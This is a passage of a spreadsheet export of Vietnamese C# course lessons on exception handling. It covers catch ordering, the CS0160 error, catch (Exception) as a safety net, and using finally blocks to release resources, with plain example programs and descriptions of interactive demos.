Để ghi log (Logging): Khi bạn muốn ghi lại tất cả các lỗi xảy ra trong một phần cụ thể của ứng dụng, kể cả những lỗi bạn không dự đoán được. Sau khi ghi log, bạn có thể chọn re-throw exception (throw;) để một tầng cao hơn xử lý tiếp, hoặc xử lý nó một cách chung chung.
Cung cấp một "lưới an toàn" cuối cùng: Đôi khi, có những lỗi bạn thực sự không thể dự đoán hoặc không cần xử lý cụ thể. catch (Exception ex) đảm bảo rằng chương trình không bị crash mà thay vào đó có thể thực hiện một hành động dự phòng (fallback action).
Khi nào không nên (hoặc cần cẩn trọng) sử dụng catch (Exception ex):
"Nuốt chửng" lỗi (Swallowing exceptions): Đây là sai lầm phổ biến nhất. Nếu bạn chỉ viết catch (Exception ex) { /* không làm gì cả */ } hoặc chỉ in ra một thông báo chung chung mà không ghi log hoặc xử lý có ý nghĩa, bạn đang che giấu một vấn đề tiềm ẩn. Điều này làm cho việc gỡ lỗi trở nên cực kỳ khó khăn.
try
{
    // Code có thể gây lỗi
}
catch (Exception ex)
{
    // KHÔNG NÊN: Nuốt chửng lỗi mà không xử lý hoặc ghi log
    // Chương trình sẽ tiếp tục chạy như thể không có lỗi nào xảy ra,
    // nhưng vấn đề gốc vẫn tồn tại.
}
Thay thế cho kiểm tra logic nghiệp vụ hoặc đầu vào:try-catch không nên là giải pháp thay thế cho việc validate dữ liệu đầu vào hoặc kiểm tra các điều kiện tiên quyết. Ví dụ, thay vì try-catch một ArgumentNullException khi truyền null vào một phương thức, hãy kiểm tra null trước khi gọi phương thức đó.
// KHÔNG NÊN: Dùng try-catch để kiểm tra null
/*
try {
    ProcessData(null);
}
catch (ArgumentNullException ex) {
    Console.WriteLine("Dữ liệu không được null.");
}
*/
// NÊN: Kiểm tra null trước
string data = null;
if (data == null)
{
    Console.WriteLine("Dữ liệu không được null.");
}
else
{
    ProcessData(data);
}
Tại các tầng thấp hơn của ứng dụng: Ở các tầng thấp hơn (ví dụ: các lớp thư viện, các phương thức nội bộ), bạn thường muốn xử lý các exception cụ thể có ý nghĩa trong ngữ cảnh đó, hoặc để exception được truyền lên tầng trên để xử lý tổng thể hơn. Việc bắt Exception tổng quát ở tầng thấp có thể làm mất đi ngữ cảnh lỗi cụ thể, gây khó khăn cho việc xử lý ở tầng cao hơn.
Khi bạn chỉ cần bắt một vài loại exception cụ thể: Nếu bạn biết chính xác những loại exception nào có thể xảy ra và cách xử lý chúng, hãy sử dụng các khối catch cụ thể cho những loại đó. catch (Exception ex) chỉ nên là phương án dự phòng cuối cùng.
Tóm lại, catch (Exception ex) là một công cụ quan trọng để đảm bảo sự ổn định của ứng dụng, nhưng nó nên được coi là một "lưới an toàn" ở cấp độ cao, không phải là một giải pháp thay thế cho việc xử lý lỗi cụ thể và có trách nhiệm.</t>
        </is>
      </c>
      <c r="W19" s="22" t="inlineStr">
        <is>
          <t># Thứ tự bắt Exception và Exception chung
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Mô tả cây kế thừa của exception và vai trò của lớp `Exception` ở gốc cây.
- Giải thích vì sao phải đặt `catch` cụ thể trước, `catch` chung sau.
- Nhận ra lỗi biên dịch CS0160 khi thứ tự `catch` sai.
- Dùng `catch (Exception)` như lưới an toàn cuối cùng và biết khi nào nên cẩn trọng.
- Quan sát exception leo lên các lớp cha bằng hoạt động mô phỏng.
## Exception là một cây kế thừa
Mọi exception trong .NET đều kế thừa từ lớp `Exception`. Một phần của cây kế thừa trông như sau:
```
Exception
└── SystemException
    ├── FormatException
    ├── NullReferenceException
    └── ArithmeticException
        ├── DivideByZeroException
        └── OverflowException
```
Vì là quan hệ kế thừa, một `DivideByZeroException` cũng là một `ArithmeticException`, một `SystemException` và một `Exception`. Một `catch` khai báo kiểu nào thì bắt được exception thuộc kiểu đó **và mọi lớp con** của nó.
## Quy tắc: cụ thể trước, chung sau
C# xét các `catch` từ trên xuống và dừng ở `catch` khớp đầu tiên. Vì vậy:
- Đặt các `catch` **cụ thể** (như `FormatException`) ở trên.
- Đặt `catch` **chung** (như `Exception`) ở dưới cùng.
```csharp
using System;
public class Program
{
    public static void Main()
    {
        try
        {
            throw new DivideByZeroException();
        }
        catch (FormatException)
        {
            Console.WriteLine("Sai số");
        }
        catch (DivideByZeroException)
        {
            Console.WriteLine("Chia 0");
        }
        catch (Exception)
        {
            Console.WriteLine("Lỗi khác");
        }
    }
}
// Kết quả: Chia 0
```
### Catch chung bắt lỗi lạ
Nếu ném một lỗi mà hai `catch` đầu không nhắc tới, ví dụ `NullReferenceException`, nó sẽ rơi xuống cửa cuối. `NullReferenceException` kế thừa `SystemException`, và `SystemException` kế thừa `Exception`, nên `catch (Exception)` bắt được. Chương trình không bị dừng đột ngột. Kết quả in ra: `Lỗi khác`.
### Thứ tự sai là lỗi biên dịch
Nếu đặt `catch (Exception)` lên trước, nó đã bắt mọi exception, nên `catch (FormatException)` phía sau không bao giờ chạy tới được. C# không cho phép điều này:
```csharp
try
{
    int n = int.Parse(input);
}
catch (Exception)
{
    Console.WriteLine("Lỗi");
}
catch (FormatException)   // lỗi biên dịch CS0160
{
    Console.WriteLine("Sai số");
}
```
Thông báo lỗi:
```
error CS0160: A previous catch clause already catches all exceptions of this or of a super type ('Exception')
```
Đây là **lỗi biên dịch** chứ không phải lỗi lúc chạy. Cách sửa là đảo thứ tự: `catch (FormatException)` trước, `catch (Exception)` sau cùng.
## Hoạt động: Cây exception và các cửa catch
Mô phỏng dưới đây có một cây kế thừa exception ở trên và các cửa `catch` ở dưới. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Thứ tự đúng**. Dòng `throw` ném `DivideByZeroException`. Cửa 1 `catch (FormatException)` không khớp vì hai kiểu nằm ở hai nhánh khác nhau của cây. Cửa 2 `catch (DivideByZeroException)` khớp (sáng xanh), in "Chia 0". Cửa 3 không được xét.
- Mở tab **Exception chung bắt lỗi lạ**. Lần này ném `NullReferenceException`. Cả cửa 1 lẫn cửa 2 đều không khớp. Hãy quan sát cây: exception "leo" lên `SystemException` rồi `Exception`. Cửa 3 `catch (Exception)` khớp, in "Lỗi khác".
- Mở tab **Thứ tự sai**. `catch (Exception)` đứng đầu và cả cây sáng lên vì cửa này bắt được tất cả. Khi trình biên dịch xét `catch (FormatException)` phía sau, nó thấy `FormatException` leo lên `Exception`, tức là đã bị bắt từ trước. Thẻ lỗi CS0160 hiện ra và chương trình không chạy được. Bước cuối cho thấy cách sửa: đảo thứ tự hai `catch`.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/bat-va-xu-ly-nhieu-loai-exception/thu-tu-bat-exception-va-exception-chung/" title="Thứ tự catch và Exception chung" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: một `catch` bắt được mọi exception là con cháu của kiểu nó khai báo. Vì vậy hãy xếp `catch` cụ thể trước và `catch (Exception)` ở cuối cùng như lưới an toàn. Xếp sai thứ tự sẽ bị trình biên dịch từ chối.
## Khi nào dùng catch (Exception)?
`catch (Exception)` hữu ích khi:
- Bạn cần một lưới an toàn ở tầng ngoài cùng, để ghi log và báo lỗi thân thiện thay vì để chương trình dừng đột ngột.
- Bạn không thể liệt kê hết các lỗi có thể xảy ra.
Hãy cẩn trọng vì:
- **Đừng nuốt lỗi:** một `catch` rỗng làm lỗi biến mất mà không ai biết. Ít nhất hãy ghi log.
- **Đừng dùng để thay cho kiểm tra thông thường:** với lỗi có thể đoán trước, như biến `null`, hãy kiểm tra trước thay vì chờ `NullReferenceException`.
```csharp
string? name = null;
// Nên: kiểm tra trước
if (name != null)
{
    Console.WriteLine(name.Length);
}
```
## Tóm tắt
- Mọi exception đều kế thừa từ `Exception`. Một `catch` bắt được kiểu nó khai báo và mọi lớp con.
- C# xét các `catch` từ trên xuống và dừng ở `catch` khớp đầu tiên.
- Luôn đặt `catch` cụ thể trước, `catch` chung sau.
- Đặt `catch` chung lên trước `catch` cụ thể gây lỗi biên dịch CS0160.
- `catch (Exception)` ở cuối là lưới an toàn cho lỗi không lường trước, nhưng không dùng để nuốt lỗi.</t>
        </is>
      </c>
    </row>
    <row r="20" ht="409.6" customHeight="1" s="18">
      <c r="A20" s="10" t="n">
        <v>19</v>
      </c>
      <c r="B20" s="10" t="inlineStr">
        <is>
          <t>2. Xử lý lỗi và Ngoại lệ (Exception Handling) Cơ bản</t>
        </is>
      </c>
      <c r="C20" s="10" t="inlineStr">
        <is>
          <t>Khối finally và các trường hợp đặc biệt</t>
        </is>
      </c>
      <c r="D20" s="10" t="inlineStr">
        <is>
          <t>Khối finally là gì và khi nào sử dụng</t>
        </is>
      </c>
      <c r="E20" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F20" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G20" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H20" s="10" t="inlineStr">
        <is>
          <t>Thấy finally luôn chạy: khi không lỗi, khi có lỗi được bắt, và cả khi try có return.</t>
        </is>
      </c>
      <c r="I20" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J20" s="10" t="inlineStr">
        <is>
          <t>Sơ đồ luồng try → catch → finally → sau khối. Đường đi tô theo từng tình huống; khối finally luôn được tô kèm nhãn 'luôn chạy'. Console in theo đúng thứ tự thực thi.</t>
        </is>
      </c>
      <c r="K20" s="10" t="inlineStr">
        <is>
          <t>H04</t>
        </is>
      </c>
      <c r="L20" s="10" t="inlineStr">
        <is>
          <t>Không lỗi | Có lỗi được bắt | Có return trong try</t>
        </is>
      </c>
      <c r="M20" s="10" t="inlineStr">
        <is>
          <t>Không lỗi: try chạy hết → bỏ qua catch → finally in "Dọn dẹp" → "Sau khối".
Có lỗi: try ném lỗi → catch in thông báo → finally in "Dọn dẹp" → "Sau khối".
Có return: hàm return 10 trong try → finally vẫn chạy và in "Dọn dẹp" trước khi hàm thật sự trả về; dòng "Sau khối" trong hàm không chạy.
Bước cuối: so sánh thứ tự in ở 3 tab.</t>
        </is>
      </c>
      <c r="N20" s="10" t="inlineStr">
        <is>
          <t>Code cố định</t>
        </is>
      </c>
      <c r="O20" s="10" t="inlineStr">
        <is>
          <t>Đặt mã dọn dẹp (đóng tệp, đóng kết nối, ghi log) vào finally.</t>
        </is>
      </c>
      <c r="P20" s="10" t="inlineStr">
        <is>
          <t>finally không chạy nếu tiến trình bị kết thúc đột ngột (Environment.FailFast, tắt nguồn).</t>
        </is>
      </c>
      <c r="Q20" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/khoi-finally-va-cac-truong-hop-dac-biet/khoi-finally-la-gi-va-khi-nao-su-dung/index.html</t>
        </is>
      </c>
      <c r="R20" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/khoi-finally-va-cac-truong-hop-dac-biet/khoi-finally-la-gi-va-khi-nao-su-dung/</t>
        </is>
      </c>
      <c r="S20" s="10" t="n"/>
      <c r="T20" s="12" t="n"/>
      <c r="U20" s="12" t="n"/>
      <c r="V20" s="21" t="inlineStr">
        <is>
          <t>Khối finally là gì?
Trong lập trình C#, khi làm việc với cơ chế xử lý ngoại lệ (exception handling) bằng các khối try và catch, chúng ta có một khối mã đặc biệt khác gọi là finally. Khối finally là một khối mã luôn được thực thi sau khi khối try đã chạy xong, hoặc sau khi một khối catch đã bắt và xử lý một ngoại lệ, bất kể có ngoại lệ nào xảy ra hay không.
Hãy hình dung try-catch-finally như một quy trình:
try: "Thử" thực hiện một công việc nào đó có thể gây ra lỗi.
catch: "Bắt" lấy và xử lý lỗi nếu công việc trong try thất bại.
finally: "Cuối cùng", dù công việc có thành công hay thất bại, dù có lỗi hay không có lỗi, bạn vẫn phải làm một điều gì đó.
Điều này làm cho finally trở thành một công cụ cực kỳ quan trọng để đảm bảo rằng các tác vụ dọn dẹp hoặc giải phóng tài nguyên luôn được thực hiện, giúp chương trình của bạn ổn định và hiệu quả hơn.
Cú pháp và vị trí của khối finally
Khối finally luôn được đặt sau khối try và, nếu có, sau tất cả các khối catch liên quan. Một khối try có thể có nhiều khối catch nhưng chỉ có duy nhất một khối finally.
Cú pháp cơ bản của cấu trúc try-catch-finally trong C# như sau:
try
{
    // Đoạn mã có thể gây ra ngoại lệ
    // Ví dụ: Mở file, kết nối database, thực hiện phép chia
}
catch (ExceptionType1 ex)
{
    // Xử lý ngoại lệ loại ExceptionType1
}
catch (ExceptionType2 ex)
{
    // Xử lý ngoại lệ loại ExceptionType2
}
finally
{
    // Đoạn mã này luôn được thực thi,
    // bất kể có ngoại lệ xảy ra hay không và đã được xử lý hay chưa.
    // Thường dùng để giải phóng tài nguyên.
}
Để hiểu rõ hơn về cách finally hoạt động, hãy xem ví dụ đơn giản sau:
using System;
public class FinallyDemo
{
    public static void Main(string[] args)
    {
        Console.WriteLine("Bắt đầu chương trình.");
        try
        {
            Console.WriteLine("Trong khối try: Đang thực hiện phép chia.");
            int a = 10;
            int b = 0;
            int result = a / b; // Thao tác này sẽ gây ra DivideByZeroException
            Console.WriteLine($"Kết quả: {result}");
        }
        catch (DivideByZeroException ex)
        {
            Console.WriteLine($"Trong khối catch: Lỗi chia cho 0 đã xảy ra: {ex.Message}");
        }
        finally
        {
            Console.WriteLine("Trong khối finally: Luôn được thực thi, dù có lỗi hay không.");
        }
        Console.WriteLine("Kết thúc chương trình.");
        Console.WriteLine("\n--- Ví dụ không có lỗi ---");
        try
        {
            Console.WriteLine("Trong khối try: Đang thực hiện phép cộng.");
            int x = 5;
            int y = 3;
            int sum = x + y;
            Console.WriteLine($"Tổng: {sum}");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Trong khối catch: Một lỗi đã xảy ra: {ex.Message}");
        }
        finally
        {
            Console.WriteLine("Trong khối finally: Luôn được thực thi, dù có lỗi hay không.");
        }
        Console.WriteLine("Kết thúc chương trình (lần 2).");
    }
}
Khi bạn chạy chương trình này, bạn sẽ thấy:
Trong trường hợp có lỗi chia cho 0, khối try sẽ chạy, gây lỗi, khối catch sẽ xử lý lỗi, và sau đó khối finally vẫn chạy.
Trong trường hợp không có lỗi (phép cộng), khối try sẽ chạy thành công, và khối finally vẫn chạy.
Khối finally đảm bảo rằng một số đoạn mã nhất định sẽ được thực thi, bất kể luồng chương trình bình thường hay luồng xử lý ngoại lệ.
Mục đích chính của finally: Giải phóng tài nguyên
Mục đích quan trọng nhất của khối finally là để thực hiện các tác vụ dọn dẹp và giải phóng tài nguyên mà chương trình đã cấp phát. Trong lập trình, tài nguyên là bất cứ thứ gì mà hệ điều hành hoặc môi trường runtime cung cấp cho ứng dụng của bạn và cần được trả lại khi không còn sử dụng nữa. Nếu không giải phóng tài nguyên đúng cách, chúng có thể bị "rò rỉ" (resource leak), dẫn đến các vấn đề như:
Tiêu tốn bộ nhớ: Các đối tượng không được giải phóng vẫn chiếm giữ bộ nhớ.
Khóa tài nguyên: Các file, kết nối database, hoặc socket mạng bị khóa, ngăn cản các ứng dụng khác (hoặc chính ứng dụng đó) sử dụng chúng.
Giảm hiệu suất: Hệ thống phải quản lý nhiều tài nguyên hơn mức cần thiết.
Mất dữ liệu: Dữ liệu có thể không được ghi hoàn chỉnh vào file hoặc database nếu chương trình bị crash mà chưa kịp đóng kết nối.
Các loại tài nguyên phổ biến cần được giải phóng trong khối finally bao gồm:
File handles: Khi bạn mở một file để đọc hoặc ghi (ví dụ: FileStream, StreamReader, StreamWriter), bạn cần đóng nó lại để giải phóng khóa file và đảm bảo dữ liệu được ghi hoàn tất.
Kết nối cơ sở dữ liệu: Khi mở một kết nối đến database (ví dụ: SqlConnection, OracleConnection), bạn cần đóng nó lại để giải phóng kết nối và tài nguyên mạng.
Kết nối mạng (sockets): Tương tự như database, các kết nối mạng cần được đóng.
Tài nguyên đồ họa (GDI objects): Các đối tượng như bút, cọ, font chữ trong các ứng dụng GUI cần được giải phóng.
Ví dụ, nếu bạn đang đọc một file và một lỗi xảy ra giữa chừng, bạn vẫn muốn đảm bảo rằng file đó được đóng lại. Nếu không có finally, file có thể vẫn bị khóa và không thể truy cập được bởi các chương trình khác cho đến khi ứng dụng của bạn kết thúc hoàn toàn (hoặc bị buộc dừng).
Ví dụ thực tế: Đóng file trong khối finally
Hãy xem một ví dụ cụ thể về việc sử dụng finally để đảm bảo một file được đóng lại, ngay cả khi có lỗi xảy ra trong quá trình đọc:
using System;
using System.IO;
public class FileHandler
{
    public static void ReadFileAndProcess(string filePath)
    {
        StreamReader reader = null; // Khởi tạo null để đảm bảo có thể truy cập trong finally
        try
        {
            Console.WriteLine($"Đang mở file: {filePath}");
            reader = new StreamReader(filePath); // Mở file
            // Giả định một lỗi xảy ra trong quá trình đọc
            Console.WriteLine("Đang đọc dữ liệu...");
            string line = reader.ReadLine();
            Console.WriteLine($"Dòng đầu tiên: {line}");
            // Tạo ra một lỗi giả định (ví dụ: chuyển đổi không hợp lệ)
            // Nếu không có lỗi này, toàn bộ khối try sẽ chạy xong.
            // int value = int.Parse("abc"); // Bỏ comment để kiểm tra lỗi
            Console.WriteLine("Đã đọc xong file.");
        }
        catch (FileNotFoundException ex)
        {
            Console.WriteLine($"Lỗi: Không tìm thấy file '{filePath}'. {ex.Message}");
        }
        catch (FormatException ex)
        {
            Console.WriteLine($"Lỗi: Định dạng dữ liệu không hợp lệ. {ex.Message}");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Một lỗi không xác định đã xảy ra: {ex.Message}");
        }
        finally
        {
            // Đảm bảo Stream Reader được đóng, nếu nó đã được mở.
            if (reader != null)
            {
                reader.Close(); // Đóng file
                Console.WriteLine("File đã được đóng trong khối finally.");
            }
            else
            {
                Console.WriteLine("Không có file nào được mở hoặc file đã đóng trước đó.");
            }
        }
        Console.WriteLine("Kết thúc xử lý file.");
    }
    public static void Main(string[] args)
    {
        // Tạo một file tạm để thử nghiệm
        string testFilePath = "testfile.txt";
        File.WriteAllText(testFilePath, "Dòng 1\nDòng 2\nDòng 3");
        Console.WriteLine("--- Trường hợp thành công ---");
        ReadFileAndProcess(testFilePath);
        Console.WriteLine("\n--- Trường hợp lỗi (file không tồn tại) ---");
        ReadFileAndProcess("nonexistent.txt");
        Console.WriteLine("\n--- Trường hợp lỗi (giả định lỗi định dạng nếu bỏ comment) ---");
        // Để kiểm tra trường hợp lỗi định dạng, bạn cần bỏ comment dòng 'int value = int.Parse("abc");'
        // và chạy lại chương trình.
        ReadFileAndProcess(testFilePath);
        // Dọn dẹp file tạm
        File.Delete(testFilePath);
    }
}
Trong ví dụ trên, dù có lỗi FileNotFoundException hay một lỗi FormatException (nếu bạn bỏ comment dòng gây lỗi), hoặc thậm chí nếu mọi thứ diễn ra suôn sẻ, khối finally vẫn sẽ được thực thi. Điều này đảm bảo rằng StreamReader (và do đó file đang được đọc) luôn được đóng lại một cách an toàn, ngăn chặn các vấn đề về tài nguyên.
Khối finally là một phần không thể thiếu của việc xử lý ngoại lệ mạnh mẽ, giúp chương trình của bạn đáng tin cậy và quản lý tài nguyên hiệu quả hơn.</t>
        </is>
      </c>
      <c r="W20" s="22" t="inlineStr">
        <is>
          <t># Khối finally là gì và khi nào sử dụng
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích khối `finally` làm gì và vì sao nó hữu ích.
- Viết cấu trúc `try-catch-finally` đúng cú pháp.
- Dự đoán thứ tự in ra khi không có lỗi, khi có lỗi được bắt và khi `try` có `return`.
- Nhận ra mã nào nên đặt trong `finally` (đóng tệp, đóng kết nối, ghi log).
- Quan sát đường đi của chương trình qua `try`, `catch`, `finally` bằng hoạt động mô phỏng.
## Khối finally là gì?
**Khối `finally`** là phần mã đi kèm `try` và **luôn chạy**, dù `try` có lỗi hay không. Nó thường dùng để **dọn dẹp**: đóng tệp, đóng kết nối, giải phóng tài nguyên, ghi log.
Hãy hình dung bạn mượn một cuốn sách ở thư viện. Dù đọc xong hay đọc dở vì có việc đột xuất, bạn vẫn phải trả sách. Phần "trả sách" chính là `finally`.
## Cú pháp
```csharp
try
{
    // Mã có thể gây lỗi
}
catch (FormatException)
{
    // Xử lý lỗi (tùy chọn)
}
finally
{
    // Mã dọn dẹp, luôn chạy
}
```
- `finally` đứng **sau** `try` và sau mọi `catch`.
- Có thể viết `try-catch-finally`, hoặc `try-finally` không có `catch`.
- Mỗi khối `try` chỉ có tối đa một `finally`.
Ví dụ đầy đủ:
```csharp
using System;
public class Program
{
    public static void Main()
    {
        try
        {
            int n = int.Parse("abc");
        }
        catch (FormatException)
        {
            Console.WriteLine("Bắt lỗi");
        }
        finally
        {
            Console.WriteLine("Dọn dẹp");
        }
        Console.WriteLine("Sau khối");
    }
}
// Bắt lỗi
// Dọn dẹp
// Sau khối
```
## finally chạy trong ba tình huống
| Tình huống | Thứ tự in ra |
|---|---|
| `try` chạy suôn sẻ, không lỗi | Thử, Dọn dẹp, Sau khối |
| `try` ném lỗi và `catch` bắt được | Bắt lỗi, Dọn dẹp, Sau khối |
| `try` có `return` | Dọn dẹp, rồi hàm mới trả về |
### Trường hợp có return trong try
Khi `try` gặp `return`, hàm chưa thoát ngay. C# chạy `finally` trước, rồi mới trả giá trị về nơi gọi:
```csharp
using System;
public class Program
{
    static int Tinh()
    {
        try
        {
            return 10;
        }
        finally
        {
            Console.WriteLine("Dọn dẹp");
        }
        Console.WriteLine("Sau khối");   // không bao giờ chạy
    }
    public static void Main()
    {
        int x = Tinh();
        Console.WriteLine(x);
    }
}
// Dọn dẹp
// 10
```
Dòng `Console.WriteLine("Sau khối")` nằm sau một khối luôn `return`, nên không bao giờ chạy. Trình biên dịch sẽ báo cảnh báo CS0162 (mã không thể tới được). Ở đây ta giữ lại dòng đó chỉ để thấy nó bị bỏ qua.
**Lưu ý:** `finally` chỉ không chạy khi tiến trình bị kết thúc đột ngột, ví dụ tắt nguồn hoặc gọi `Environment.FailFast`.
## Hoạt động: Đường đi qua try, catch và finally
Mô phỏng dưới đây vẽ đường đi của chương trình qua bốn chặng: `try`, `catch`, `finally` và "Sau khối". Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Không lỗi**. `try` in "Thử" và không có lỗi. `catch` bị bỏ qua (chặng mờ), chương trình nhảy thẳng xuống `finally`. `finally` vẫn chạy và in "Dọn dẹp", rồi "Sau khối". Thứ tự in: Thử, Dọn dẹp, Sau khối.
- Mở tab **Có lỗi được bắt**. `int.Parse("abc")` ném `FormatException` (thẻ lỗi đỏ). `catch (FormatException)` khớp, in "Bắt lỗi". Sau đó `finally` chạy và in "Dọn dẹp", rồi "Sau khối". Thứ tự in: Bắt lỗi, Dọn dẹp, Sau khối.
- Mở tab **Có return trong try**. Gọi `Tinh()`, `try` gặp `return 10` nhưng giá trị 10 phải chờ. `finally` chạy trước và in "Dọn dẹp". Dòng "Sau khối" bị bỏ qua (chặng bị gạch). Hàm trả về 10 và dòng cuối in 10. Thứ tự in: Dọn dẹp, 10.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/khoi-finally-va-cac-truong-hop-dac-biet/khoi-finally-la-gi-va-khi-nao-su-dung/" title="Khối finally" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: cả ba tab đều in "Dọn dẹp". `finally` chạy khi không có lỗi, khi có lỗi được bắt và cả khi `try` đã `return`.
## Khi nào dùng finally?
Đặt vào `finally` những việc **phải làm xong dù có lỗi hay không**:
- Đóng tệp (`StreamReader`, `StreamWriter`).
- Đóng kết nối cơ sở dữ liệu hoặc mạng.
- Giải phóng khóa (lock) hoặc tài nguyên hệ thống khác.
- Ghi log kết thúc một thao tác.
Đừng đặt vào `finally` mã nghiệp vụ chính hoặc mã có thể tự ném lỗi mà không kiểm soát, vì lỗi trong `finally` có thể che mất lỗi gốc.
## Lỗi thường gặp
- **Quên rằng `finally` chạy cả khi không có lỗi.** Đừng đặt vào đó mã chỉ nên chạy khi có lỗi. Mã đó thuộc về `catch`.
- **Đặt mã nghiệp vụ chính vào `finally`.** `finally` dành cho việc dọn dẹp, còn việc chính nên nằm trong `try`.
- **Cho rằng `catch` bắt buộc phải có.** Cấu trúc `try-finally` hợp lệ. Lỗi vẫn lan ra ngoài, nhưng `finally` vẫn chạy trước khi nó đi tiếp.
## Tóm tắt
- `finally` đi kèm `try` và **luôn chạy**, dù có lỗi hay không.
- Cấu trúc có thể là `try-catch-finally` hoặc `try-finally`.
- Không lỗi: `try`, rồi `finally`. Có lỗi được bắt: `catch`, rồi `finally`.
- Khi `try` có `return`, `finally` chạy trước khi hàm trả về.
- Dùng `finally` để dọn dẹp: đóng tệp, đóng kết nối, ghi log.</t>
        </is>
      </c>
    </row>
    <row r="21" ht="409.6" customHeight="1" s="18">
      <c r="A21" s="10" t="n">
        <v>20</v>
      </c>
      <c r="B21" s="10" t="inlineStr">
        <is>
          <t>2. Xử lý lỗi và Ngoại lệ (Exception Handling) Cơ bản</t>
        </is>
      </c>
      <c r="C21" s="10" t="inlineStr">
        <is>
          <t>Khối finally và các trường hợp đặc biệt</t>
        </is>
      </c>
      <c r="D21" s="10" t="inlineStr">
        <is>
          <t>Sử dụng finally để đảm bảo tài nguyên được giải phóng</t>
        </is>
      </c>
      <c r="E21" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F21" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G21" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H21" s="10" t="inlineStr">
        <is>
          <t>Thấy finally giúp đóng tệp ngay cả khi lỗi xảy ra giữa chừng.</t>
        </is>
      </c>
      <c r="I21" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Không finally | Có finally</t>
        </is>
      </c>
      <c r="J21" s="10" t="inlineStr">
        <is>
          <t>Biểu tượng tệp data.txt có đèn trạng thái (Đóng / Đang mở / Vẫn mở – rò rỉ). Sơ đồ luồng thu nhỏ dưới mỗi cột.</t>
        </is>
      </c>
      <c r="K21" s="10" t="inlineStr">
        <is>
          <t>H08, H04, H03</t>
        </is>
      </c>
      <c r="L21" s="10" t="inlineStr">
        <is>
          <t>Lỗi khi đang đọc</t>
        </is>
      </c>
      <c r="M21" s="10" t="inlineStr">
        <is>
          <t>Hai cột mở data.txt bằng StreamReader → đèn 'Đang mở'.
Đọc dòng 1 bình thường.
Dòng 2 không phải số, int.Parse ném FormatException.
Trái: Close() nằm sau dòng lỗi nên không chạy; catch báo lỗi; đèn vẫn 'Đang mở' (đỏ).
Phải: catch báo lỗi, finally gọi reader.Close() → đèn 'Đóng'.
Xong: so sánh trạng thái tệp hai bên.</t>
        </is>
      </c>
      <c r="N21" s="10" t="inlineStr">
        <is>
          <t>data.txt: 10 / abc / 30</t>
        </is>
      </c>
      <c r="O21" s="10" t="inlineStr">
        <is>
          <t>Đưa lệnh giải phóng tài nguyên vào finally để nó chạy trong mọi trường hợp.</t>
        </is>
      </c>
      <c r="P21" s="10" t="inlineStr">
        <is>
          <t>Cách gọn hơn là using (học ở chương sau).</t>
        </is>
      </c>
      <c r="Q21" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/khoi-finally-va-cac-truong-hop-dac-biet/su-dung-finally-de-dam-bao-tai-nguyen-duoc-giai-phong/index.html</t>
        </is>
      </c>
      <c r="R21" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/khoi-finally-va-cac-truong-hop-dac-biet/su-dung-finally-de-dam-bao-tai-nguyen-duoc-giai-phong/</t>
        </is>
      </c>
      <c r="S21" s="10" t="n"/>
      <c r="T21" s="12" t="n"/>
      <c r="U21" s="12" t="n"/>
      <c r="V21" s="21" t="inlineStr">
        <is>
          <t>Tầm quan trọng của việc giải phóng tài nguyên
Trong các ứng dụng thực tế, chương trình của bạn thường xuyên phải tương tác với các "tài nguyên bên ngoài" (external resources). Các tài nguyên này bao gồm: tệp tin (file), kết nối cơ sở dữ liệu (database connection), socket mạng, hoặc các handle của hệ điều hành.
Vấn đề nằm ở chỗ: các tài nguyên này thường có giới hạn. Nếu bạn mở một tệp tin để đọc dữ liệu nhưng quên đóng nó lại sau khi xử lý xong, tệp đó sẽ bị "khóa" mãi mãi cho đến khi chương trình kết thúc hoặc bộ thu gom rác (Garbage Collector) can thiệp – điều mà chúng ta không nên phụ thuộc vào. Khi xảy ra ngoại lệ, luồng thực thi của chương trình bị ngắt quãng, và nếu không có cơ chế đảm bảo, các dòng code đóng tài nguyên sẽ bị bỏ qua. Đó chính là lúc finally trở thành "cứu cánh" cho lập trình viên.
Cấu trúc đảm bảo an toàn với khối finally
Để đảm bảo tài nguyên luôn được giải phóng, chúng ta cần đặt các lệnh đóng (như Close() hoặc Dispose()) bên trong khối finally. Dưới đây là ví dụ minh họa cách xử lý một tệp tin văn bản an toàn:
using System;
using System.IO;
public void ReadFileContent(string filePath)
{
    StreamReader reader = null;
    try
    {
        reader = new StreamReader(filePath);
        string content = reader.ReadToEnd();
        Console.WriteLine(content);
    }
    catch (FileNotFoundException ex)
    {
        Console.WriteLine($"Lỗi: Không tìm thấy tệp - {ex.Message}");
    }
    finally
    {
